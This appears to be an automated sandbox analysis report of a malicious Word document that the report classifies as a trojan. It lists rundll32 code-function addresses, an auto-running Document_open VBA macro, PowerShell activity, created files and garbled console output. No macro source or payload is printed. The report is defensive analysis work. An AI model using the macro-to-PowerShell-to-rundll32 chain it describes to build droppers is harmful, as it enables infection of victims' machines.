Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002000FE 8_2_002000FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002038C2 8_2_002038C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002034C3 8_2_002034C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F50F1 8_2_001F50F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002008CF 8_2_002008CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F68EC 8_2_001F68EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F30E8 8_2_001F30E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020A6D9 8_2_0020A6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00209EDA 8_2_00209EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00203D29 8_2_00203D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00207132 8_2_00207132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00209333 8_2_00209333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FB10A 8_2_001FB10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020D138 8_2_0020D138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F4304 8_2_001F4304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020B706 8_2_0020B706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FEF2E 8_2_001FEF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FF52E 8_2_001FF52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FFF2C 8_2_001FFF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00202515 8_2_00202515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F3523 8_2_001F3523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FA323 8_2_001FA323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020891E 8_2_0020891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020B165 8_2_0020B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FEB54 8_2_001FEB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F2353 8_2_001F2353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00201372 8_2_00201372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F4D48 8_2_001F4D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00202179 8_2_00202179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F177C 8_2_001F177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F0D7A 8_2_001F0D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F2B70 8_2_001F2B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00206158 8_2_00206158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020C15B 8_2_0020C15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F5D63 8_2_001F5D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020C5A1 8_2_0020C5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00201BA5 8_2_00201BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00207FA7 8_2_00207FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FF797 8_2_001FF797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F9D95 8_2_001F9D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002041AB 8_2_002041AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FF793 8_2_001FF793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F498C 8_2_001F498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F598B 8_2_001F598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FDB86 8_2_001FDB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F1983 8_2_001F1983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F3DB8 8_2_001F3DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FD5B8 8_2_001FD5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020819F 8_2_0020819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FD3F5 8_2_001FD3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F27F3 8_2_001F27F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FB3E8 8_2_001FB3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FFBE6 8_2_001FFBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0043303C 8_2_0043303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00441E14 8_2_00441E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00286417 9_2_00286417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029A0F1 9_2_0029A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00298C2B 9_2_00298C2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029D02D 9_2_0029D02D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028A821 9_2_0028A821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00290223 9_2_00290223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00292631 9_2_00292631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00298A33 9_2_00298A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00294C37 9_2_00294C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00282208 9_2_00282208
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028240F 9_2_0028240F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00292C05 9_2_00292C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00281806 9_2_00281806
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00285418 9_2_00285418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028E612 9_2_0028E612
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029AA7B 9_2_0029AA7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028327F 9_2_0028327F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00290672 9_2_00290672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028BE74 9_2_0028BE74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00284844 9_2_00284844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028E044 9_2_0028E044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00295250 9_2_00295250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028CAA3 9_2_0028CAA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028DE81 9_2_0028DE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00294A9E 9_2_00294A9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00291090 9_2_00291090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029D4E1 9_2_0029D4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028ECFE 9_2_0028ECFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028D6F0 9_2_0028D6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028A6C9 9_2_0028A6C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029C6D9 9_2_0029C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028D2DD 9_2_0028D2DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028A2D2 9_2_0028A2D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00289D2F 9_2_00289D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028A525 9_2_0028A525
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00283938 9_2_00283938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00287B39 9_2_00287B39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029CF31 9_2_0029CF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00287731 9_2_00287731
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00283336 9_2_00283336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029D70B 9_2_0029D70B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00285F04 9_2_00285F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00294F04 9_2_00294F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00289106 9_2_00289106
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028F369 9_2_0028F369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028C364 9_2_0028C364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029B165 9_2_0029B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029A966 9_2_0029A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00287378 9_2_00287378
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00285B7D 9_2_00285B7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00283B74 9_2_00283B74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00299B4A 9_2_00299B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00293F4F 9_2_00293F4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029434E 9_2_0029434E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028C145 9_2_0028C145
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029135B 9_2_0029135B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002993AA 9_2_002993AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00283FAF 9_2_00283FAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028ADAF 9_2_0028ADAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00292FA1 9_2_00292FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002909B8 9_2_002909B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028F9BA 9_2_0028F9BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028FFBA 9_2_0028FFBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00299DBF 9_2_00299DBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00297BBE 9_2_00297BBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002947B5 9_2_002947B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00291F88 9_2_00291F88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00290B8A 9_2_00290B8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00297187 9_2_00297187
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00284D90 9_2_00284D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00293590 9_2_00293590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029C192 9_2_0029C192
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028BB96 9_2_0028BB96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002867EF 9_2_002867EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028F5E0 9_2_0028F5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00296BE4 9_2_00296BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029CBE7 9_2_0029CBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002835FC 9_2_002835FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00287FFE 9_2_00287FFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00291DFE 9_2_00291DFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029BBF1 9_2_0029BBF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029DBC4 9_2_0029DBC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00282DDF 9_2_00282DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002857D4 9_2_002857D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002B303C 9_2_002B303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002A87D0 9_2_002A87D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C1E14 9_2_002C1E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034C017 9_2_0034C017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00354012 9_2_00354012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034C851 9_2_0034C851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349846 9_2_00349846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003590BE 9_2_003590BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003470AD 9_2_003470AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003428AA 9_2_003428AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003450F1 9_2_003450F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003500FE 9_2_003500FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003468EC 9_2_003468EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003430E8 9_2_003430E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034E8DD 9_2_0034E8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034B8D8 9_2_0034B8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003538C2 9_2_003538C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003508CF 9_2_003508CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00357132 9_2_00357132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035D138 9_2_0035D138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035891E 9_2_0035891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034B10A 9_2_0034B10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00352179 9_2_00352179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035B165 9_2_0035B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00356158 9_2_00356158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C15B 9_2_0035C15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003541AB 9_2_003541AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035819F 9_2_0035819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00341983 9_2_00341983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034498C 9_2_0034498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034598B 9_2_0034598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034E272 9_2_0034E272
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035CA55 9_2_0035CA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003492A3 9_2_003492A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349A99 9_2_00349A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00359333 9_2_00359333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034A323 9_2_0034A323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344304 9_2_00344304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342B70 9_2_00342B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00351372 9_2_00351372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034EB54 9_2_0034EB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342353 9_2_00342353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00351BA5 9_2_00351BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034DB86 9_2_0034DB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034D3F5 9_2_0034D3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034FBE6 9_2_0034FBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034B3E8 9_2_0034B3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349C3D 9_2_00349C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035CC7F 9_2_0035CC7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00345478 9_2_00345478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00354478 9_2_00354478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035BC4D 9_2_0035BC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003534BF 9_2_003534BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C4A5 9_2_0035C4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00346CA5 9_2_00346CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003514FC 9_2_003514FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003534C3 9_2_003534C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00343523 9_2_00343523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F52E 9_2_0034F52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00353D29 9_2_00353D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00352515 9_2_00352515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00340D7A 9_2_00340D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00345D63 9_2_00345D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344D48 9_2_00344D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00343DB8 9_2_00343DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034D5B8 9_2_0034D5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C5A1 9_2_0035C5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349D95 9_2_00349D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350604 9_2_00350604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00359665 9_2_00359665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034B6B9 9_2_0034B6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342EAC 9_2_00342EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003566FB 9_2_003566FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035A6D9 9_2_0035A6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00359EDA 9_2_00359EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034FF2C 9_2_0034FF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034EF2E 9_2_0034EF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035B706 9_2_0035B706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034177C 9_2_0034177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00357FA7 9_2_00357FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F797 9_2_0034F797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F793 9_2_0034F793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003427F3 9_2_003427F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002BA821 10_2_002BA821
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: N00048481397007.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module U765y5vgf_ao0faq, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: N00048481397007.doc OLE indicator, VBA macros: true
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@44/12@6/5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$0048481397007.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD7F7.tmp Jump to behavior
Source: N00048481397007.doc OLE indicator, Word Document stream: true
Source: N00048481397007.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ........................................ .C.......C.............p.......................#...............................h.......5kU............. Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K......h.q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....(.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... ..............................}..v............0...............h.q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....H.q.............................}..v............0.................q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............U..j....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............U..j..... ..............................}..v....X.......0.................q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j....0Lq.............................}..v.....q......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j....@r..............................}..v.....r......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j....0Lq.............................}..v.....y......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j....@z..............................}..v.....z......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j....0Lq.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j....@...............................}..v............0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0................Hq.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j....................................}..v............0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.5.............}..v.... .......0................Hq.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0............................................... Jump to behavior
